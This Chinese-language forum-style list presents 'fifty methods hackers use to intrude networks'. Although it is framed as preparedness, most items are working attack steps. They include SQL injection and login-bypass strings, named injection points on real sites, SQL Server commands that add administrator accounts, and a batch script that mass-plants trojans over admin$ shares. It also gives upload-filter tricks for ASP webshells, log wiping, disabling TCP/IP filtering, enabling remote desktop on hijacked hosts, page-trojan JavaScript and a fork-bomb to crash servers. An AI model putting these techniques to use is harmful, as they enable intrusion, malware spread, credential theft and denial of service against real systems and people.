現(xiàn)在網(wǎng)上的攻擊事件越來越多,黑客都是通過什么方法來攻擊我們的呢?下面我們給大家總結(jié)了黑客入侵網(wǎng)絡(luò)的五十種方法,讓大家做到有備無患。
1.網(wǎng)寬網(wǎng)絡(luò)有限公司制作的網(wǎng)站基本都有注入漏洞 搜索網(wǎng)寬網(wǎng)絡(luò)
2.搜索欄里輸入
關(guān)鍵字%'and 1=1 and '%'='
關(guān)鍵字%'and 1=2 and '%'='
比較不同處 可以作為注入的特征字符
3.登陸框用戶名和密碼輸入'or'='or' 漏洞很老但是現(xiàn)在很是遍地都是
4.我們先到www.google.com底下搜索一下co net mib ver 1.0
密碼賬號(hào)都是 'or'='or'
5.掛馬代碼
6.http://www.wyyfk.com/24小時(shí)掛qq工具
7.開啟regedt32的sam的管理員權(quán)限 檢查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理員和guest的f鍵值,如果一樣就是用被入侵過了,然后刪了guest賬號(hào),對(duì)方可以用guest賬號(hào)使用administraeors的權(quán)限,你也可以用這方法留住肉雞,這方法是簡(jiǎn)單克隆,
net localgroup administrators還是可以看出guest是管理員來
7.只要敢想,新浪也可入侵 注入點(diǎn)
http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59
微軟官方網(wǎng)站注入點(diǎn)
http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=
8.ms05016攻擊工具用法 mshta.exe test.hta 文件名.后綴名 可以綁上qq大盜木馬
9.有sa權(quán)限sqlserver數(shù)據(jù)庫、并且能sql注入支持fso+asp的服務(wù)器
sql注入后,如何上傳木馬,
文章地址http://hack123.home4u.china.com/0601.htm
10.qq強(qiáng)制聊天代碼
http://wpa.qq.com/msgrd?v=1&uin=對(duì)方的qq號(hào)&site=ioshenmue&menu=yes
使用方法:把代碼中的紅色的“********”星號(hào)換成你想與其聊天的qq號(hào)后復(fù) 制到瀏覽器的地址欄處即可。無論他是否你的好友,你無須加他為好友就能給 他發(fā)qq消息。
11. mybbs論壇cookie欺騙 后臺(tái)備份馬
12.軟件instsrv.exe 把.exe文件做成系統(tǒng)服務(wù)來啟動(dòng) 用來肉雞掛qq等
用法: 安裝: instsrv.exe 服務(wù)名稱 路徑
卸載: instsrv.exe 服務(wù)名稱 remove
13.以動(dòng)網(wǎng)為例數(shù)據(jù)庫查找dv_log,在上面的查詢的字段名里選l_content后面的關(guān)鍵字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submit=%cc%ed+%bc%d3 password2=01180017就是他的登陸密碼
14.搜索的技巧 inurl:網(wǎng)址
15.啟航工作室wms 5.0網(wǎng)站程序漏洞
在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)
利用動(dòng)畫看http://soft.77169.com/62/20050530/6824.html
16.很多網(wǎng)站程序(比如華碩中文官方網(wǎng)站)上傳圖片時(shí)有可能在檢測(cè)文件的時(shí)候是 從左朝又進(jìn)行檢測(cè),也就是說,他會(huì)檢測(cè)文件是不是有.jpg,那么我們要是把文件改成:ating.jpg.asp試試。。由于還是asp結(jié)尾,所以木馬不會(huì)變~
17.天意商務(wù)系統(tǒng)網(wǎng)上依然有 有漏洞 網(wǎng)站具體的樣式http://www.wzgcc.org/
工具下載www.hack6.com
地址欄里,填上天意商務(wù)系統(tǒng)的網(wǎng)址就可以了,注意一定要是主頁面
18.sql注入時(shí)工具---internet選項(xiàng)---高級(jí)里找到顯示友好的錯(cuò)誤信息勾去掉
不能注入時(shí)要第一時(shí)間想到%5c暴庫
19.這個(gè)dbinbd.asp文件插入后門的功能適用于文件名為.asp的所有access數(shù)據(jù)庫不是動(dòng)網(wǎng)論壇也一樣可以使用的,后門隱蔽,幾乎發(fā)現(xiàn)不了
工具使用方法動(dòng)畫和所有文件
http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811
20.缺少xp_cmdshell時(shí)
嘗試恢復(fù)exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
假如恢復(fù)不成功,可以嘗試直接加用戶(針對(duì)開3389的)
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理員
21.批量種植木馬.bat
for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$ 復(fù)制木馬到掃描的計(jì)算機(jī)當(dāng)中
for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對(duì)方計(jì)算機(jī)上運(yùn)行木馬的時(shí)間
掃描地址.txt里每個(gè)主機(jī)名一行 用\\開頭
22.搜索 powered by discuz!4.0.0rc3 開放頭像的可利用 工具地址www.hack6.com
23.dv7.1用還原數(shù)據(jù)功能 還原asa木馬
24.凡人網(wǎng)絡(luò)購物系統(tǒng)v6.0 可以%5c暴庫
25.ipb2.0.2漏洞 構(gòu)造語句
$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where /* 暴管理員密碼 想看動(dòng)畫到黑基里找 ipb<= 2.0.3論壇注入工具www.hack6.com有下載
26. 將工具傳到郵箱 在下載上右擊 復(fù)制快捷方式 擁有自己了的下載空間
27.北京沖qb要寬帶號(hào)跟綁定寬帶的后4位電話,當(dāng)你掃出北京款待號(hào)的密碼必須是8位的密碼,而且開頭是6或8的才可以,因?yàn)楸本┑碾娫挾际?根8開頭的而且都是8位的,北京的區(qū)名海淀 東城 西城 門頭溝 豐臺(tái) 潮陽 宣武 通州 昌平,去http://cnc.qq.com/bbn/沖
28.搜索 企業(yè)網(wǎng)絡(luò)辦公系統(tǒng) 添'or''=' 登陸 在個(gè)人郵箱 上傳asp木馬
29.本人原創(chuàng) 搜索"一點(diǎn)點(diǎn)星空驛站 留言本" 默認(rèn)數(shù)據(jù)庫是gbmdb.mdb 很多網(wǎng)站用這個(gè)留言本 但是用搜索引擎搜不到 可以給大家在入寢時(shí)多個(gè)思路
30.在程序上傳shell過程中,程序不允許包含標(biāo)記符號(hào)的內(nèi)容的文件上傳,比如藍(lán)屏最小 的asp木馬,我們來把他的標(biāo)簽換一下: 保存為.asp,程序照樣 執(zhí)行.
31.目錄權(quán)限設(shè)置變態(tài)的話可以用一些方法(比如serv-u溢出)將此web用戶提權(quán) 可訪問全站目錄掛馬
32.喜歡網(wǎng)頁掛馬的看看這篇總結(jié)文章吧
http://77169.com/news/hk/2005060611656.html
33.搜索"images/admin" 或".tw/images/admin" 可以找到些臺(tái)灣的數(shù)據(jù)庫
34.iis6 for windows 2003 enterprise edition 如iis發(fā)布目錄文件夾包含.asp后輟名.
將.asp后輟改為.jpg或其它的如.htm,也可以運(yùn)行asp,但要在.asp文件夾下.
.cer 等后綴的文件夾下都可以運(yùn)行任何后綴的asp木馬
35.telnet一臺(tái)交換機(jī) 然后在telnet控制主機(jī) 控制主機(jī)留下的是交換機(jī)的ip
然后用#clear logg和#clear line vty *刪除日志
36.搜索關(guān)鍵字:"copyright 2003-2004 動(dòng)易網(wǎng)絡(luò)" 后面地址改成upfile_soft.asp 這樣的漏洞很多
37.bbsxp的漏洞總結(jié) powered by bbsxp 5.15/licence blog.asp中的對(duì)id 的過濾不嚴(yán)的漏洞 拿到管理員的前后臺(tái)密碼 工具:bbsxp完全版 cookies 欺騙 bbsxp 過濾了 asp 文件的上傳 所以我們這里用 asa 來傳馬
38.學(xué)會(huì)總結(jié)入侵思路http://www.77169.com/news/hk/2005060811688.html
39.電腦壞了省去重新安裝系統(tǒng)的方法
純dos下執(zhí)行,
xp:copy c:\windows\repair\*.* 到 c:\windows\system32\config
2k: copy c:\winnt\repair\*.* 到 c:\winnt\system32\config
40.一般人設(shè)置啊拉qq大盜的時(shí)候發(fā)信和收信都是同一個(gè)信箱,因此當(dāng)我的機(jī)子中了此木馬后沒有立即殺掉進(jìn)程,而是用內(nèi)存編輯工具打開它的進(jìn)程,查找smtp字樣,就會(huì)找到它的信箱和密碼了。只對(duì)1.5以前的管用.
41.內(nèi)網(wǎng)控制內(nèi)網(wǎng) 用vidc 還要有一只肉雞 動(dòng)畫看黑基的
http://soft.77169.com/62/20050608/6878.html
42.有許多管理員用備份的日期做備份數(shù)據(jù)庫的名字
比如http://www.hack6.com/bbs/databackup/20050601.mdb
43.動(dòng)網(wǎng)數(shù)據(jù)庫oldusername=%b5%f0%b7%c0&username2=%b5%f0%b7%c0&password2=19841202&adduser=%b5%f0%b7%c0&id=12&submit=%b8%fc+%d0%c2
不知道用戶名(不是%b8%f0%b7%c0) 轉(zhuǎn)化這個(gè)用他本身的頁面
http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2
%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2這句話意思是“填寫登錄信息”
那么就把%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2換成%b5%f0%b7%c0 可以看到用戶名
44.對(duì)付信息監(jiān)控系統(tǒng) 木馬必須是加密的 如net user用不了就用net1 user等等 我是大連的 大連這邊主機(jī)用這方法好用 可以直接傳加密的馬 用用黑基tyrant的方法 上傳一個(gè)cmd的aspshall 用nc連接自己的nc監(jiān)聽端口 在web目錄下寫個(gè)加ftp用戶的txt 本地43958用nc提交 ftp到服務(wù)器加用戶
45.解決tcp/ip篩選 在注冊(cè)表里有三處,分別是:
hkey_local_machine\system\controlset001\services\tcpip
hkey_local_machine\system\controlset002\services\tcpip
hkey_local_machine\system\currentcontrolset\services\tcpip
分別用
regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip
regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip
regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip
命令來導(dǎo)出注冊(cè)表項(xiàng)
然后把三個(gè)文件里的enablesecurityfilters"=dword:00000001,
改成enablesecurityfilters"=dword:00000000 再將以上三個(gè)文件分別用
regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 導(dǎo)入注冊(cè)表即可
46.使chm木馬無法在本地運(yùn)行木馬程序 將注冊(cè)表"hkey_current_u
ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004項(xiàng)的值由原來十進(jìn)制的0改為十六進(jìn)制的3。
47.開3389的5種方法
(1)打開記事本,編輯內(nèi)容如下:
echo [components] > c:\sql
echo tsenable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好后存為bat文件,上傳至肉雞,執(zhí)行。
(2) (對(duì)xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
下載地址:www.netsill.com/rots.zip
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調(diào)用腳本,例如:
c:\>cscript rots.vbs <目標(biāo)ip> <用戶名> <密碼> [服務(wù)端口] [/r]
如果要對(duì)本地使用,ip地址為127.0.0.1或者一個(gè)點(diǎn)(用.表示),用戶名和密碼都為空(用 ""表示)。
(3)djshao正式版5.0
解壓djshao5.0.zip,用你的隨便什么方法把把解壓出來的djxyx*.**e上傳到肉雞的c:\winnt\temp下,然后 進(jìn)入c:\winnt\temp目錄執(zhí)行djxyx*.**e解壓縮文件,然后再執(zhí)行解壓縮出來的azzd.exe文件,等一會(huì)肉雞 會(huì)自動(dòng)重啟!重啟后會(huì)出現(xiàn)終端服務(wù)
(4)下載dameware nt utilities 3.66.0.0 注冊(cè)版
地址www.netsill.com/dwmrcw36600.zip
安裝注冊(cè)完畢后輸入對(duì)方ip用戶名密碼,等待出現(xiàn)是否安裝的對(duì)話框點(diǎn)是。
復(fù)制啟動(dòng)后出現(xiàn)對(duì)方桌面。
在對(duì)方桌面進(jìn)入控制面版,點(diǎn)添加或刪除程序。進(jìn)入后點(diǎn)添加/刪除windows組件,找到終端服務(wù),點(diǎn)際進(jìn)入 后在啟動(dòng)終端服務(wù)上打上勾。確定自動(dòng)提示重起,重起后ok
(5)大家最常用的 3389.exe 下載地址www.hack6.com把程序上傳到肉雞運(yùn)行后重啟既可
48.qq上得到別人的ip
一般跟別人聊天 如果是對(duì)方先對(duì)你說話 那么她的ip顯示出來的概率就大
當(dāng)然如果是我們找對(duì)方 可以先跟她說發(fā)過去消息之后 然后關(guān)閉窗口等待她的回復(fù)
還可以用天網(wǎng)防火墻選擇上udp數(shù)據(jù)保檢測(cè),即可攔截到對(duì)方ip
49.掛馬js代碼document.write('');保存到j(luò)s頁面里 可讓所有頁面掛馬
50.讓服務(wù)器重啟
寫個(gè)bat死循環(huán):
@echo off
:loop1
cls
start cmd.exe
goto loop1
保存成bat guset權(quán)限就可以運(yùn)行 運(yùn)行后很快服務(wù)器就會(huì)死機(jī) 管理員自然會(huì)去重啟